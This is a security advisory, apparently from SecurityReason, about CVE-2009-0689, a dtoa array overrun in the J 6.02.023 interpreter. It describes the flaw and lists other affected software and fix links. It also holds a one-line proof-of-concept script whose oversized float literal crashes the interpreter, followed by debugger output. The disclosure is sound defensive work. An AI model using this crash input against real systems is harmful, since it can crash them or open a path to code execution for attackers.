J 6.02.023 Array Overrun

`[ J 6.02.023 Array Overrun (code execution) ]  
  
Author: Maksymilian Arciemowicz and sp3x  
http://SecurityReason.com  
Date:  
- Dis.: 07.05.2009  
- Pub.: 08.01.2010  
  
CVE: CVE-2009-0689  
CWE: CWE-119  
Risk: High  
Remote: Yes  
  
Affected Software:  
- J 6.02.023 Array Overrun (code execution)  
  
NOTE: Prior versions may also be affected.  
  
Original URL:  
http://securityreason.com/achievement_securityalert/79  
  
  
--- 0.Description ---  
The J programming language, developed in the early 1990s by Ken Iverson  
and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL  
function-level languages created by John Backus.  
  
To avoid repeating the APL special character problem, J requires only  
the basic ASCII character set, resorting to the use of digraphs formed  
using the dot or colon characters to extend the meaning of the basic  
characters available. Additionally, to keep parsing and the language  
simple, and to compensate for the lack of character variation in ASCII,  
J treats many characters which might need to be balanced in other  
languages (such as [] {} "" `` or <>) as stand alone tokens or (with  
digraphs) treats them as part of a multi-character token.  
  
Being an array programming language, J is very terse and powerful, and  
is most suited to mathematical and statistical programming, especially  
when performing operations on matrices. J is a MIMD language.  
  
--- 1. J 6.02.023 Array Overrun (code execution) ---  
The main problem exist in dtoa implementation. J has the same dtoa as  
MatLab, OpenBSD, MacOS, Google, Opera etc.  
and it is the same like SREASONRES:20090625.  
  
http://securityreason.com/achievement_securityalert/63  
  
but fix for SREASONRES:20090625, used by openbsd was not good.  
More information about fix for openbsd and similars SREASONRES:20091030,  
  
http://securityreason.com/achievement_securityalert/69  
  
We can create any number of float, which will overwrite the memory. In  
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it  
is possible to call 16<= elements of freelist array.  
  
  
--- 2. Proof of Concept (PoC) ---  
There are several ways to make a successful attack. Simplest assumed the  
creation of a script with a defective floating-point variable and  
execution it. This will allow the possibility of code execution.  
  
-expl.ijs----------------------  
cxib=0.<?php echo str_repeat("1",296450); ?>  
-expl.ijs----------------------  
  
Program received signal SIGSEGV, Segmentation fault.  
0x00452157 in ?? ()  
  
eax 0x4c2000 4988928  
ecx 0x2c667c 2909820  
edx 0x46d054 4640852  
ebx 0x48a607 296455  
esp 0x98f720 0x98f720  
ebp 0x98f77c 0x98f77c  
esi 0x4363808 70662152  
edi 0x0 0  
eip 0x452157 0x452157  
eflags 0x10206 [ PF IF RF ]  
cs 0x1b 27  
ss 0x23 35  
ds 0x23 35  
es 0x23 35  
fs 0x3b 59  
gs 0x0 0  
  
edi=0  
  
(gdb) x/i $eip  
0x452157: test %eax,(%eax)  
(gdb) x/x $eax  
0x4c2000: 0x00000000  
  
  
--- 3. SecurityReason Note ---  
Officialy SREASONRES:20090625 has been detected in:  
- OpenBSD  
- NetBSD  
- FreeBSD  
- MacOSX  
- Google Chrome  
- Mozilla Firefox  
- Mozilla Seamonkey  
- Mozilla Thunderbird  
- Mozilla Sunbird  
- Mozilla Camino  
- KDE (example: konqueror)  
- Opera  
- K-Meleon  
- F-Lock  
- MatLab  
- J  
  
This list is not yet closed.  
  
  
--- 4. Fix ---  
NetBSD fix (optimal):  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h  
  
OpenBSD fix:  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c  
  
  
--- 5. Credits ---  
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.  
  
  
--- 6. Greets ---  
Infospec p_e_a pi3  
  
  
--- 7. Contact ---  
Email:  
- cxib {a.t] securityreason [d0t} com  
- sp3x {a.t] securityreason [d0t} com  
  
GPG:  
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
- http://securityreason.com/key/sp3x.gpg  
  
http://securityreason.com/  
http://securityreason.com/exploit_alert/ - Exploit Database  
http://securityreason.com/security_alert/ - Vulnerability Database  
  
  
  
`